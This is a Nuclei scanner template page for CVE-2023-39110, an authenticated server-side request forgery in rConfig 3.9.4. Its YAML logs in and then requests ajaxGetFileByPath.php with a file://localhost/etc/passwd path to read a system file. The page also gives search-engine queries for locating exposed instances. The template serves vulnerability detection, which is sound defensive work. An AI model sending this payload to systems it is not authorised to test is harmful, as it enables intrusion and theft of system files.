Skip to content
Nuclei Templates

rConfig 3.9.4 - Server-Side Request Forgery

ID: CVE-2023-39110

Severity: high

Author: theamanrawat

Tags: cve2023,cve,rconfig,authenticated,ssrf,lfr

Description

Section titled “Description”

rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.

YAML Source

Section titled “YAML Source”
id: CVE-2023-39110


info:
  name: rConfig 3.9.4 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39110
    - https://github.com/zer0yu/CVE_Request
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-39110
    cwe-id: CWE-918
    epss-score: 0.05213
    epss-percentile: 0.92994
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2023,cve,rconfig,authenticated,ssrf,lfr


http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true


    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"


      - type: word
        part: body_1
        words:
          - 'rConfig'


      - type: status
        part: header_3
        status:
          - 200
# digest: 4a0a00473045022100ee22a3d1fa9e165681d7f8050ada41c23334a1e3779197f58607dbd53fca858d0220646df576b69cb9cda15bbe8a3489858e7444fe62be4bdd26ee199bad989f1957:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39110.yaml"

View on Github